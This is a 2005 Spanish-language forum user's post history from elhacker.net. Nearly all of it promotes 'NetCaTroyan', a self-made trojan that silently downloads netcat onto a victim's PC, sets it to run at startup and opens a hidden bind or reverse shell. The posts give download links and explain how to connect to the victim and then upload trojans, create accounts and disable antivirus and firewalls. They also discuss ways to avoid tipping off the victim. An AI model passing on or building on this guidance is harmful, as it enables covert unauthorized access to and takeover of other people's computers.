elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 [2]
11  Programación / Programación Visual Basic / Re: como hacer un chat para varios pc's en: 15 Septiembre 2005, 16:47 pm
eso tiene muy facil solucion, simplemente creas una matriz de controles del socket del servidor para que acepte mas de una solicitud de conexion.
12  Seguridad Informática / Hacking / Re: Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 13 Julio 2005, 17:46 pm
hola que tal a ver he estado sin pasarme por aki mucho tiempo por otros temas y weno la verdad es que el programita lo abandone pero le hare de nuevo por que lo borre del pc, ademas parece que la cuenta en gratisweb donde estaba desaparecio, esta hecho en vb y el codigo es muyyyy facil lo unico kizas un poco "complicado" son las variables que se guardan para editar el server, en cuanto lo re haga lo subo y lo  pongo aki, y decir que kuando le hice funcionaba ( a mi por lo menos) en win 98 y xp.
13  Seguridad Informática / Hacking / Re: Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 26 Abril 2005, 01:56 am
AnThRaX_x tienes que subir el nc.exe a algun servidor donde tu kieras x ejemplo gratisweb.com . y en el programa pones :http://gratisweb.com/antrax/nc.exe o la ruta pertinente.
14  Seguridad Informática / Hacking / Re: Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 25 Abril 2005, 00:01 am
bueno ya esta un poco mejorado, ya lo podeis user, podeis renombrar el server.exe como kerais, otra kosa, tendreis que subir el netcat, osea el nc.exe a el servidor que kerais y indicarlo en el programa. Otra cosa, solo se puede editar el server una vez, asike si lo kereis editar mas veces borrais la karpeta y volveis a descomprimir. aver si pa la siguiente version corrijo ese fallo y consigo poner lo de sell inversa a una determinada hora del dia.

descargar http://venus.walagata.com/w/nc2k5/1401581.rar
15  Seguridad Informática / Hacking / Re: Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 22 Abril 2005, 21:45 pm
trankilo estoy apunto de akabar el programa y he incluido la opcion de reiniciar el pc de la victima y elegir tu de donde bajar el nc.. en breve lo colgare
16  Seguridad Informática / Hacking / Re: Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 19 Abril 2005, 23:44 pm
jajaja ta kurrao el diseño eh xD

na pos mu facil, si has elegido reverse shell, kuando le mandes el server, el programa te abrira el solo dos nc a la escucha en tu pc para que su nc se konecte al tuyo y ya tienes shell, por uno de los nc recibiras la informacion y x el otro la enviaras.
si has elegido abrir un puerto pos simplemente abres tu nc, pones nc -vv ipvictima puerto y te conectas, y ya tienes shell.

una vez dentro ya sabes puedes subir troyanos krear users etc etc etc.

tambien estoy pensando en poner una opcion para que se ejecute una shell inversa a una hora determinada del dia.... no se
17  Seguridad Informática / Hacking / Re: Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 19 Abril 2005, 23:09 pm
la shell se ejecuta en segundo plano, oculto vamos  :)
18  Seguridad Informática / Hacking / Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 19 Abril 2005, 18:51 pm
holas mi nick real es ^Nous^ pero se me fue la pinza al registrarme xDD.
weno he hecho una kutrada pa instalar el netcat al pardillo de turno, lo que hace este prog es bajarse el nc de una web, instalarlo en el directorio del  sistema y que se inicie siempre que se arranke win.
tambien trae un edit server para elegir si kieres simplemente abrirle un puerto a la victima y conectarte o si prefieres que se te conecte el por reverse shelll.
un fallo que tiene es que solo funciona si editas el server una sola vez, la 2ª ya no lo guarda, asike mejor que no os ekibokeis o simpelemente borrais la karpeta y deskompriimis otra vez, asi ya podeis volver a editar el server, el q x cierto esta comprimido en upx.

ya solo decir que el diseño es mas que kutre xDDD pero que kieres si lo he hecho en 15-20mins.

enlace: http://www.gratisweb.com/nc2k5/NetCaTroyanBy^Nous^.rar


ale ya podeis ponerme verde x esta p**a bazofia xD.

weno ya sabreis que despues de que le paseis el server al tio no tendreis shell hasta que no reinicie xq no he puesto pa que se ejecute el netcat ... jeje y paso de hacer que se reinicie el pc despues de descargar el netcat xq sino canta mucho. despues si eso esta noche hago que se ejecute el netcat despues de ser descargado y asi no tener que esperar a que reinicien el pc... como ya todos sabreis despues con la shell podeis subir vuestros troyanos o haceros un user  detener AVs y firewalls.... xao.
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines